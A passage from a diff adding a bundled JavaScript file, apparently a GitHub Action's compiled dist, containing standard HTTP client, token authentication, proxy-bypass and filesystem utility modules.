${Buffer.from(`PAT:${this.token}`).toString('base64')}`; + } + // This handler cannot handle 401 + canHandleAuthentication() { + return false; + } + handleAuthentication() { + return __awaiter(this, void 0, void 0, function* () { + throw new Error('not implemented'); + }); + } +} +exports.PersonalAccessTokenCredentialHandler = PersonalAccessTokenCredentialHandler; +//# sourceMappingURL=auth.js.map + +/***/ }), + +/***/ 6255: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +/* eslint-disable @typescript-eslint/no-explicit-any */ +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + var desc = Object.getOwnPropertyDescriptor(m, k); + if (!desc || ("get" in desc ? !m.__esModule : desc.writable || desc.configurable)) { + desc = { enumerable: true, get: function() { return m[k]; } }; + } + Object.defineProperty(o, k2, desc); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.prototype.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? 
value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.HttpClient = exports.isHttps = exports.HttpClientResponse = exports.HttpClientError = exports.getProxyUrl = exports.MediaTypes = exports.Headers = exports.HttpCodes = void 0; +const http = __importStar(__nccwpck_require__(3685)); +const https = __importStar(__nccwpck_require__(5687)); +const pm = __importStar(__nccwpck_require__(9835)); +const tunnel = __importStar(__nccwpck_require__(4294)); +const undici_1 = __nccwpck_require__(1773); +var HttpCodes; +(function (HttpCodes) { + HttpCodes[HttpCodes["OK"] = 200] = "OK"; + HttpCodes[HttpCodes["MultipleChoices"] = 300] = "MultipleChoices"; + HttpCodes[HttpCodes["MovedPermanently"] = 301] = "MovedPermanently"; + HttpCodes[HttpCodes["ResourceMoved"] = 302] = "ResourceMoved"; + HttpCodes[HttpCodes["SeeOther"] = 303] = "SeeOther"; + HttpCodes[HttpCodes["NotModified"] = 304] = "NotModified"; + HttpCodes[HttpCodes["UseProxy"] = 305] = "UseProxy"; + HttpCodes[HttpCodes["SwitchProxy"] = 306] = "SwitchProxy"; + HttpCodes[HttpCodes["TemporaryRedirect"] = 307] = "TemporaryRedirect"; + HttpCodes[HttpCodes["PermanentRedirect"] = 308] = "PermanentRedirect"; + HttpCodes[HttpCodes["BadRequest"] = 400] = "BadRequest"; + HttpCodes[HttpCodes["Unauthorized"] = 401] = "Unauthorized"; + HttpCodes[HttpCodes["PaymentRequired"] = 402] = "PaymentRequired"; + HttpCodes[HttpCodes["Forbidden"] = 403] = "Forbidden"; + HttpCodes[HttpCodes["NotFound"] = 404] = "NotFound"; + 
HttpCodes[HttpCodes["MethodNotAllowed"] = 405] = "MethodNotAllowed"; + HttpCodes[HttpCodes["NotAcceptable"] = 406] = "NotAcceptable"; + HttpCodes[HttpCodes["ProxyAuthenticationRequired"] = 407] = "ProxyAuthenticationRequired"; + HttpCodes[HttpCodes["RequestTimeout"] = 408] = "RequestTimeout"; + HttpCodes[HttpCodes["Conflict"] = 409] = "Conflict"; + HttpCodes[HttpCodes["Gone"] = 410] = "Gone"; + HttpCodes[HttpCodes["TooManyRequests"] = 429] = "TooManyRequests"; + HttpCodes[HttpCodes["InternalServerError"] = 500] = "InternalServerError"; + HttpCodes[HttpCodes["NotImplemented"] = 501] = "NotImplemented"; + HttpCodes[HttpCodes["BadGateway"] = 502] = "BadGateway"; + HttpCodes[HttpCodes["ServiceUnavailable"] = 503] = "ServiceUnavailable"; + HttpCodes[HttpCodes["GatewayTimeout"] = 504] = "GatewayTimeout"; +})(HttpCodes || (exports.HttpCodes = HttpCodes = {})); +var Headers; +(function (Headers) { + Headers["Accept"] = "accept"; + Headers["ContentType"] = "content-type"; +})(Headers || (exports.Headers = Headers = {})); +var MediaTypes; +(function (MediaTypes) { + MediaTypes["ApplicationJson"] = "application/json"; +})(MediaTypes || (exports.MediaTypes = MediaTypes = {})); +/** + * Returns the proxy URL, depending upon the supplied url and proxy environment variables. + * @param serverUrl The server URL where the request will be sent. For example, https://api.github.com + */ +function getProxyUrl(serverUrl) { + const proxyUrl = pm.getProxyUrl(new URL(serverUrl)); + return proxyUrl ? 
proxyUrl.href : ''; +} +exports.getProxyUrl = getProxyUrl; +const HttpRedirectCodes = [ + HttpCodes.MovedPermanently, + HttpCodes.ResourceMoved, + HttpCodes.SeeOther, + HttpCodes.TemporaryRedirect, + HttpCodes.PermanentRedirect +]; +const HttpResponseRetryCodes = [ + HttpCodes.BadGateway, + HttpCodes.ServiceUnavailable, + HttpCodes.GatewayTimeout +]; +const RetryableHttpVerbs = ['OPTIONS', 'GET', 'DELETE', 'HEAD']; +const ExponentialBackoffCeiling = 10; +const ExponentialBackoffTimeSlice = 5; +class HttpClientError extends Error { + constructor(message, statusCode) { + super(message); + this.name = 'HttpClientError'; + this.statusCode = statusCode; + Object.setPrototypeOf(this, HttpClientError.prototype); + } +} +exports.HttpClientError = HttpClientError; +class HttpClientResponse { + constructor(message) { + this.message = message; + } + readBody() { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { + let output = Buffer.alloc(0); + this.message.on('data', (chunk) => { + output = Buffer.concat([output, chunk]); + }); + this.message.on('end', () => { + resolve(output.toString()); + }); + })); + }); + } + readBodyBuffer() { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve) => __awaiter(this, void 0, void 0, function* () { + const chunks = []; + this.message.on('data', (chunk) => { + chunks.push(chunk); + }); + this.message.on('end', () => { + resolve(Buffer.concat(chunks)); + }); + })); + }); + } +} +exports.HttpClientResponse = HttpClientResponse; +function isHttps(requestUrl) { + const parsedUrl = new URL(requestUrl); + return parsedUrl.protocol === 'https:'; +} +exports.isHttps = isHttps; +class HttpClient { + constructor(userAgent, handlers, requestOptions) { + this._ignoreSslError = false; + this._allowRedirects = true; + this._allowRedirectDowngrade = false; + this._maxRedirects = 50; + this._allowRetries = false; + this._maxRetries = 1; 
+ this._keepAlive = false; + this._disposed = false; + this.userAgent = userAgent; + this.handlers = handlers || []; + this.requestOptions = requestOptions; + if (requestOptions) { + if (requestOptions.ignoreSslError != null) { + this._ignoreSslError = requestOptions.ignoreSslError; + } + this._socketTimeout = requestOptions.socketTimeout; + if (requestOptions.allowRedirects != null) { + this._allowRedirects = requestOptions.allowRedirects; + } + if (requestOptions.allowRedirectDowngrade != null) { + this._allowRedirectDowngrade = requestOptions.allowRedirectDowngrade; + } + if (requestOptions.maxRedirects != null) { + this._maxRedirects = Math.max(requestOptions.maxRedirects, 0); + } + if (requestOptions.keepAlive != null) { + this._keepAlive = requestOptions.keepAlive; + } + if (requestOptions.allowRetries != null) { + this._allowRetries = requestOptions.allowRetries; + } + if (requestOptions.maxRetries != null) { + this._maxRetries = requestOptions.maxRetries; + } + } + } + options(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('OPTIONS', requestUrl, null, additionalHeaders || {}); + }); + } + get(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('GET', requestUrl, null, additionalHeaders || {}); + }); + } + del(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('DELETE', requestUrl, null, additionalHeaders || {}); + }); + } + post(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('POST', requestUrl, data, additionalHeaders || {}); + }); + } + patch(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('PATCH', requestUrl, data, additionalHeaders || {}); + }); + } + put(requestUrl, data, additionalHeaders) { + return __awaiter(this, void 0, void 0, 
function* () { + return this.request('PUT', requestUrl, data, additionalHeaders || {}); + }); + } + head(requestUrl, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request('HEAD', requestUrl, null, additionalHeaders || {}); + }); + } + sendStream(verb, requestUrl, stream, additionalHeaders) { + return __awaiter(this, void 0, void 0, function* () { + return this.request(verb, requestUrl, stream, additionalHeaders); + }); + } + /** + * Gets a typed object from an endpoint + * Be aware that not found returns a null. Other errors (4xx, 5xx) reject the promise + */ + getJson(requestUrl, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + const res = yield this.get(requestUrl, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + postJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = yield this.post(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + putJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = 
yield this.put(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + patchJson(requestUrl, obj, additionalHeaders = {}) { + return __awaiter(this, void 0, void 0, function* () { + const data = JSON.stringify(obj, null, 2); + additionalHeaders[Headers.Accept] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.Accept, MediaTypes.ApplicationJson); + additionalHeaders[Headers.ContentType] = this._getExistingOrDefaultHeader(additionalHeaders, Headers.ContentType, MediaTypes.ApplicationJson); + const res = yield this.patch(requestUrl, data, additionalHeaders); + return this._processResponse(res, this.requestOptions); + }); + } + /** + * Makes a raw http request. + * All other methods such as get, post, patch, and request ultimately call this. + * Prefer get, del, post and patch + */ + request(verb, requestUrl, data, headers) { + return __awaiter(this, void 0, void 0, function* () { + if (this._disposed) { + throw new Error('Client has already been disposed.'); + } + const parsedUrl = new URL(requestUrl); + let info = this._prepareRequest(verb, parsedUrl, headers); + // Only perform retries on reads since writes may not be idempotent. + const maxTries = this._allowRetries && RetryableHttpVerbs.includes(verb) + ? this._maxRetries + 1 + : 1; + let numTries = 0; + let response; + do { + response = yield this.requestRaw(info, data); + // Check if it's an authentication challenge + if (response && + response.message && + response.message.statusCode === HttpCodes.Unauthorized) { + let authenticationHandler; + for (const handler of this.handlers) { + if (handler.canHandleAuthentication(response)) { + authenticationHandler = handler; + break; + } + } + if (authenticationHandler) { + return authenticationHandler.handleAuthentication(this, info, data); + } + else { + // We have received an unauthorized response but have no handlers to handle it. + // Let the response return to the caller. 
+ return response; + } + } + let redirectsRemaining = this._maxRedirects; + while (response.message.statusCode && + HttpRedirectCodes.includes(response.message.statusCode) && + this._allowRedirects && + redirectsRemaining > 0) { + const redirectUrl = response.message.headers['location']; + if (!redirectUrl) { + // if there's no location to redirect to, we won't + break; + } + const parsedRedirectUrl = new URL(redirectUrl); + if (parsedUrl.protocol === 'https:' && + parsedUrl.protocol !== parsedRedirectUrl.protocol && + !this._allowRedirectDowngrade) { + throw new Error('Redirect from HTTPS to HTTP protocol. This downgrade is not allowed for security reasons. If you want to allow this behavior, set the allowRedirectDowngrade option to true.'); + } + // we need to finish reading the response before reassigning response + // which will leak the open socket. + yield response.readBody(); + // strip authorization header if redirected to a different hostname + if (parsedRedirectUrl.hostname !== parsedUrl.hostname) { + for (const header in headers) { + // header names are case insensitive + if (header.toLowerCase() === 'authorization') { + delete headers[header]; + } + } + } + // let's make the request with the new redirectUrl + info = this._prepareRequest(verb, parsedRedirectUrl, headers); + response = yield this.requestRaw(info, data); + redirectsRemaining--; + } + if (!response.message.statusCode || + !HttpResponseRetryCodes.includes(response.message.statusCode)) { + // If not a retry code, return immediately instead of retrying + return response; + } + numTries += 1; + if (numTries < maxTries) { + yield response.readBody(); + yield this._performExponentialBackoff(numTries); + } + } while (numTries < maxTries); + return response; + }); + } + /** + * Needs to be called if keepAlive is set to true in request options. + */ + dispose() { + if (this._agent) { + this._agent.destroy(); + } + this._disposed = true; + } + /** + * Raw request. 
+ * @param info + * @param data + */ + requestRaw(info, data) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve, reject) => { + function callbackForResult(err, res) { + if (err) { + reject(err); + } + else if (!res) { + // If `err` is not passed, then `res` must be passed. + reject(new Error('Unknown error')); + } + else { + resolve(res); + } + } + this.requestRawWithCallback(info, data, callbackForResult); + }); + }); + } + /** + * Raw request with callback. + * @param info + * @param data + * @param onResult + */ + requestRawWithCallback(info, data, onResult) { + if (typeof data === 'string') { + if (!info.options.headers) { + info.options.headers = {}; + } + info.options.headers['Content-Length'] = Buffer.byteLength(data, 'utf8'); + } + let callbackCalled = false; + function handleResult(err, res) { + if (!callbackCalled) { + callbackCalled = true; + onResult(err, res); + } + } + const req = info.httpModule.request(info.options, (msg) => { + const res = new HttpClientResponse(msg); + handleResult(undefined, res); + }); + let socket; + req.on('socket', sock => { + socket = sock; + }); + // If we ever get disconnected, we want the socket to timeout eventually + req.setTimeout(this._socketTimeout || 3 * 60000, () => { + if (socket) { + socket.end(); + } + handleResult(new Error(`Request timeout: ${info.options.path}`)); + }); + req.on('error', function (err) { + // err has statusCode property + // res should have headers + handleResult(err); + }); + if (data && typeof data === 'string') { + req.write(data, 'utf8'); + } + if (data && typeof data !== 'string') { + data.on('close', function () { + req.end(); + }); + data.pipe(req); + } + else { + req.end(); + } + } + /** + * Gets an http agent. This function is useful when you need an http agent that handles + * routing through a proxy server - depending upon the url and proxy environment variables. + * @param serverUrl The server URL where the request will be sent. 
For example, https://api.github.com + */ + getAgent(serverUrl) { + const parsedUrl = new URL(serverUrl); + return this._getAgent(parsedUrl); + } + getAgentDispatcher(serverUrl) { + const parsedUrl = new URL(serverUrl); + const proxyUrl = pm.getProxyUrl(parsedUrl); + const useProxy = proxyUrl && proxyUrl.hostname; + if (!useProxy) { + return; + } + return this._getProxyAgentDispatcher(parsedUrl, proxyUrl); + } + _prepareRequest(method, requestUrl, headers) { + const info = {}; + info.parsedUrl = requestUrl; + const usingSsl = info.parsedUrl.protocol === 'https:'; + info.httpModule = usingSsl ? https : http; + const defaultPort = usingSsl ? 443 : 80; + info.options = {}; + info.options.host = info.parsedUrl.hostname; + info.options.port = info.parsedUrl.port + ? parseInt(info.parsedUrl.port) + : defaultPort; + info.options.path = + (info.parsedUrl.pathname || '') + (info.parsedUrl.search || ''); + info.options.method = method; + info.options.headers = this._mergeHeaders(headers); + if (this.userAgent != null) { + info.options.headers['user-agent'] = this.userAgent; + } + info.options.agent = this._getAgent(info.parsedUrl); + // gives handlers an opportunity to participate + if (this.handlers) { + for (const handler of this.handlers) { + handler.prepareRequest(info.options); + } + } + return info; + } + _mergeHeaders(headers) { + if (this.requestOptions && this.requestOptions.headers) { + return Object.assign({}, lowercaseKeys(this.requestOptions.headers), lowercaseKeys(headers || {})); + } + return lowercaseKeys(headers || {}); + } + _getExistingOrDefaultHeader(additionalHeaders, header, _default) { + let clientHeader; + if (this.requestOptions && this.requestOptions.headers) { + clientHeader = lowercaseKeys(this.requestOptions.headers)[header]; + } + return additionalHeaders[header] || clientHeader || _default; + } + _getAgent(parsedUrl) { + let agent; + const proxyUrl = pm.getProxyUrl(parsedUrl); + const useProxy = proxyUrl && proxyUrl.hostname; + if 
(this._keepAlive && useProxy) { + agent = this._proxyAgent; + } + if (this._keepAlive && !useProxy) { + agent = this._agent; + } + // if agent is already assigned use that agent. + if (agent) { + return agent; + } + const usingSsl = parsedUrl.protocol === 'https:'; + let maxSockets = 100; + if (this.requestOptions) { + maxSockets = this.requestOptions.maxSockets || http.globalAgent.maxSockets; + } + // This is `useProxy` again, but we need to check `proxyURl` directly for TypeScripts's flow analysis. + if (proxyUrl && proxyUrl.hostname) { + const agentOptions = { + maxSockets, + keepAlive: this._keepAlive, + proxy: Object.assign(Object.assign({}, ((proxyUrl.username || proxyUrl.password) && { + proxyAuth: `${proxyUrl.username}:${proxyUrl.password}` + })), { host: proxyUrl.hostname, port: proxyUrl.port }) + }; + let tunnelAgent; + const overHttps = proxyUrl.protocol === 'https:'; + if (usingSsl) { + tunnelAgent = overHttps ? tunnel.httpsOverHttps : tunnel.httpsOverHttp; + } + else { + tunnelAgent = overHttps ? tunnel.httpOverHttps : tunnel.httpOverHttp; + } + agent = tunnelAgent(agentOptions); + this._proxyAgent = agent; + } + // if reusing agent across request and tunneling agent isn't assigned create a new agent + if (this._keepAlive && !agent) { + const options = { keepAlive: this._keepAlive, maxSockets }; + agent = usingSsl ? new https.Agent(options) : new http.Agent(options); + this._agent = agent; + } + // if not using private agent and tunnel agent isn't setup then use global agent + if (!agent) { + agent = usingSsl ? 
https.globalAgent : http.globalAgent; + } + if (usingSsl && this._ignoreSslError) { + // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process + // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options + // we have to cast it to any and change it directly + agent.options = Object.assign(agent.options || {}, { + rejectUnauthorized: false + }); + } + return agent; + } + _getProxyAgentDispatcher(parsedUrl, proxyUrl) { + let proxyAgent; + if (this._keepAlive) { + proxyAgent = this._proxyAgentDispatcher; + } + // if agent is already assigned use that agent. + if (proxyAgent) { + return proxyAgent; + } + const usingSsl = parsedUrl.protocol === 'https:'; + proxyAgent = new undici_1.ProxyAgent(Object.assign({ uri: proxyUrl.href, pipelining: !this._keepAlive ? 0 : 1 }, ((proxyUrl.username || proxyUrl.password) && { + token: `${proxyUrl.username}:${proxyUrl.password}` + }))); + this._proxyAgentDispatcher = proxyAgent; + if (usingSsl && this._ignoreSslError) { + // we don't want to set NODE_TLS_REJECT_UNAUTHORIZED=0 since that will affect request for entire process + // http.RequestOptions doesn't expose a way to modify RequestOptions.agent.options + // we have to cast it to any and change it directly + proxyAgent.options = Object.assign(proxyAgent.options.requestTls || {}, { + rejectUnauthorized: false + }); + } + return proxyAgent; + } + _performExponentialBackoff(retryNumber) { + return __awaiter(this, void 0, void 0, function* () { + retryNumber = Math.min(ExponentialBackoffCeiling, retryNumber); + const ms = ExponentialBackoffTimeSlice * Math.pow(2, retryNumber); + return new Promise(resolve => setTimeout(() => resolve(), ms)); + }); + } + _processResponse(res, options) { + return __awaiter(this, void 0, void 0, function* () { + return new Promise((resolve, reject) => __awaiter(this, void 0, void 0, function* () { + const statusCode = res.message.statusCode || 0; + const response = { + statusCode, 
+ result: null, + headers: {} + }; + // not found leads to null obj returned + if (statusCode === HttpCodes.NotFound) { + resolve(response); + } + // get the result from the body + function dateTimeDeserializer(key, value) { + if (typeof value === 'string') { + const a = new Date(value); + if (!isNaN(a.valueOf())) { + return a; + } + } + return value; + } + let obj; + let contents; + try { + contents = yield res.readBody(); + if (contents && contents.length > 0) { + if (options && options.deserializeDates) { + obj = JSON.parse(contents, dateTimeDeserializer); + } + else { + obj = JSON.parse(contents); + } + response.result = obj; + } + response.headers = res.message.headers; + } + catch (err) { + // Invalid resource (contents not json); leaving result obj null + } + // note that 3xx redirects are handled by the http layer. + if (statusCode > 299) { + let msg; + // if exception/error in body, attempt to get better error + if (obj && obj.message) { + msg = obj.message; + } + else if (contents && contents.length > 0) { + // it may be the case that the exception is in the body message as string + msg = contents; + } + else { + msg = `Failed request: (${statusCode})`; + } + const err = new HttpClientError(msg, statusCode); + err.result = response.result; + reject(err); + } + else { + resolve(response); + } + })); + }); + } +} +exports.HttpClient = HttpClient; +const lowercaseKeys = (obj) => Object.keys(obj).reduce((c, k) => ((c[k.toLowerCase()] = obj[k]), c), {}); +//# sourceMappingURL=index.js.map + +/***/ }), + +/***/ 9835: +/***/ ((__unused_webpack_module, exports) => { + +"use strict"; + +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.checkBypass = exports.getProxyUrl = void 0; +function getProxyUrl(reqUrl) { + const usingSsl = reqUrl.protocol === 'https:'; + if (checkBypass(reqUrl)) { + return undefined; + } + const proxyVar = (() => { + if (usingSsl) { + return process.env['https_proxy'] || process.env['HTTPS_PROXY']; + } + else { + 
return process.env['http_proxy'] || process.env['HTTP_PROXY']; + } + })(); + if (proxyVar) { + try { + return new URL(proxyVar); + } + catch (_a) { + if (!proxyVar.startsWith('http://') && !proxyVar.startsWith('https://')) + return new URL(`http://${proxyVar}`); + } + } + else { + return undefined; + } +} +exports.getProxyUrl = getProxyUrl; +function checkBypass(reqUrl) { + if (!reqUrl.hostname) { + return false; + } + const reqHost = reqUrl.hostname; + if (isLoopbackAddress(reqHost)) { + return true; + } + const noProxy = process.env['no_proxy'] || process.env['NO_PROXY'] || ''; + if (!noProxy) { + return false; + } + // Determine the request port + let reqPort; + if (reqUrl.port) { + reqPort = Number(reqUrl.port); + } + else if (reqUrl.protocol === 'http:') { + reqPort = 80; + } + else if (reqUrl.protocol === 'https:') { + reqPort = 443; + } + // Format the request hostname and hostname with port + const upperReqHosts = [reqUrl.hostname.toUpperCase()]; + if (typeof reqPort === 'number') { + upperReqHosts.push(`${upperReqHosts[0]}:${reqPort}`); + } + // Compare request host against noproxy + for (const upperNoProxyItem of noProxy + .split(',') + .map(x => x.trim().toUpperCase()) + .filter(x => x)) { + if (upperNoProxyItem === '*' || + upperReqHosts.some(x => x === upperNoProxyItem || + x.endsWith(`.${upperNoProxyItem}`) || + (upperNoProxyItem.startsWith('.') && + x.endsWith(`${upperNoProxyItem}`)))) { + return true; + } + } + return false; +} +exports.checkBypass = checkBypass; +function isLoopbackAddress(host) { + const hostLower = host.toLowerCase(); + return (hostLower === 'localhost' || + hostLower.startsWith('127.') || + hostLower.startsWith('[::1]') || + hostLower.startsWith('[0:0:0:0:0:0:0:1]')); +} +//# sourceMappingURL=proxy.js.map + +/***/ }), + +/***/ 1962: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? 
(function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? (function(o, v) { + Object.defineProperty(o, "default", { enumerable: true, value: v }); +}) : function(o, v) { + o["default"] = v; +}); +var __importStar = (this && this.__importStar) || function (mod) { + if (mod && mod.__esModule) return mod; + var result = {}; + if (mod != null) for (var k in mod) if (k !== "default" && Object.hasOwnProperty.call(mod, k)) __createBinding(result, mod, k); + __setModuleDefault(result, mod); + return result; +}; +var __awaiter = (this && this.__awaiter) || function (thisArg, _arguments, P, generator) { + function adopt(value) { return value instanceof P ? value : new P(function (resolve) { resolve(value); }); } + return new (P || (P = Promise))(function (resolve, reject) { + function fulfilled(value) { try { step(generator.next(value)); } catch (e) { reject(e); } } + function rejected(value) { try { step(generator["throw"](value)); } catch (e) { reject(e); } } + function step(result) { result.done ? 
resolve(result.value) : adopt(result.value).then(fulfilled, rejected); } + step((generator = generator.apply(thisArg, _arguments || [])).next()); + }); +}; +var _a; +Object.defineProperty(exports, "__esModule", ({ value: true })); +exports.getCmdPath = exports.tryGetExecutablePath = exports.isRooted = exports.isDirectory = exports.exists = exports.READONLY = exports.UV_FS_O_EXLOCK = exports.IS_WINDOWS = exports.unlink = exports.symlink = exports.stat = exports.rmdir = exports.rm = exports.rename = exports.readlink = exports.readdir = exports.open = exports.mkdir = exports.lstat = exports.copyFile = exports.chmod = void 0; +const fs = __importStar(__nccwpck_require__(7147)); +const path = __importStar(__nccwpck_require__(1017)); +_a = fs.promises +// export const {open} = 'fs' +, exports.chmod = _a.chmod, exports.copyFile = _a.copyFile, exports.lstat = _a.lstat, exports.mkdir = _a.mkdir, exports.open = _a.open, exports.readdir = _a.readdir, exports.readlink = _a.readlink, exports.rename = _a.rename, exports.rm = _a.rm, exports.rmdir = _a.rmdir, exports.stat = _a.stat, exports.symlink = _a.symlink, exports.unlink = _a.unlink; +// export const {open} = 'fs' +exports.IS_WINDOWS = process.platform === 'win32'; +// See https://github.com/nodejs/node/blob/d0153aee367422d0858105abec186da4dff0a0c5/deps/uv/include/uv/win.h#L691 +exports.UV_FS_O_EXLOCK = 0x10000000; +exports.READONLY = fs.constants.O_RDONLY; +function exists(fsPath) { + return __awaiter(this, void 0, void 0, function* () { + try { + yield exports.stat(fsPath); + } + catch (err) { + if (err.code === 'ENOENT') { + return false; + } + throw err; + } + return true; + }); +} +exports.exists = exists; +function isDirectory(fsPath, useStat = false) { + return __awaiter(this, void 0, void 0, function* () { + const stats = useStat ? yield exports.stat(fsPath) : yield exports.lstat(fsPath); + return stats.isDirectory(); + }); +} +exports.isDirectory = isDirectory; +/** + * On OSX/Linux, true if path starts with '/'. 
On Windows, true for paths like: + * \, \hello, \\hello\share, C:, and C:\hello (and corresponding alternate separator cases). + */ +function isRooted(p) { + p = normalizeSeparators(p); + if (!p) { + throw new Error('isRooted() parameter "p" cannot be empty'); + } + if (exports.IS_WINDOWS) { + return (p.startsWith('\\') || /^[A-Z]:/i.test(p) // e.g. \ or \hello or \\hello + ); // e.g. C: or C:\hello + } + return p.startsWith('/'); +} +exports.isRooted = isRooted; +/** + * Best effort attempt to determine whether a file exists and is executable. + * @param filePath file path to check + * @param extensions additional file extensions to try + * @return if file exists and is executable, returns the file path. otherwise empty string. + */ +function tryGetExecutablePath(filePath, extensions) { + return __awaiter(this, void 0, void 0, function* () { + let stats = undefined; + try { + // test file exists + stats = yield exports.stat(filePath); + } + catch (err) { + if (err.code !== 'ENOENT') { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); + } + } + if (stats && stats.isFile()) { + if (exports.IS_WINDOWS) { + // on Windows, test for valid extension + const upperExt = path.extname(filePath).toUpperCase(); + if (extensions.some(validExt => validExt.toUpperCase() === upperExt)) { + return filePath; + } + } + else { + if (isUnixExecutable(stats)) { + return filePath; + } + } + } + // try each extension + const originalFilePath = filePath; + for (const extension of extensions) { + filePath = originalFilePath + extension; + stats = undefined; + try { + stats = yield exports.stat(filePath); + } + catch (err) { + if (err.code !== 'ENOENT') { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine if executable file exists '${filePath}': ${err}`); + } + } + if (stats && stats.isFile()) { + if (exports.IS_WINDOWS) { + // preserve the case of 
the actual file (since an extension was appended) + try { + const directory = path.dirname(filePath); + const upperName = path.basename(filePath).toUpperCase(); + for (const actualName of yield exports.readdir(directory)) { + if (upperName === actualName.toUpperCase()) { + filePath = path.join(directory, actualName); + break; + } + } + } + catch (err) { + // eslint-disable-next-line no-console + console.log(`Unexpected error attempting to determine the actual case of the file '${filePath}': ${err}`); + } + return filePath; + } + else { + if (isUnixExecutable(stats)) { + return filePath; + } + } + } + } + return ''; + }); +} +exports.tryGetExecutablePath = tryGetExecutablePath; +function normalizeSeparators(p) { + p = p || ''; + if (exports.IS_WINDOWS) { + // convert slashes on Windows + p = p.replace(/\//g, '\\'); + // remove redundant slashes + return p.replace(/\\\\+/g, '\\'); + } + // remove redundant slashes + return p.replace(/\/\/+/g, '/'); +} +// on Mac/Linux, test the execute bit +// R W X R W X R W X +// 256 128 64 32 16 8 4 2 1 +function isUnixExecutable(stats) { + return ((stats.mode & 1) > 0 || + ((stats.mode & 8) > 0 && stats.gid === process.getgid()) || + ((stats.mode & 64) > 0 && stats.uid === process.getuid())); +} +// Get the path of cmd.exe in windows +function getCmdPath() { + var _a; + return (_a = process.env['COMSPEC']) !== null && _a !== void 0 ? _a : `cmd.exe`; +} +exports.getCmdPath = getCmdPath; +//# sourceMappingURL=io-util.js.map + +/***/ }), + +/***/ 7436: +/***/ (function(__unused_webpack_module, exports, __nccwpck_require__) { + +"use strict"; + +var __createBinding = (this && this.__createBinding) || (Object.create ? (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + Object.defineProperty(o, k2, { enumerable: true, get: function() { return m[k]; } }); +}) : (function(o, m, k, k2) { + if (k2 === undefined) k2 = k; + o[k2] = m[k]; +})); +var __setModuleDefault = (this && this.__setModuleDefault) || (Object.create ? 
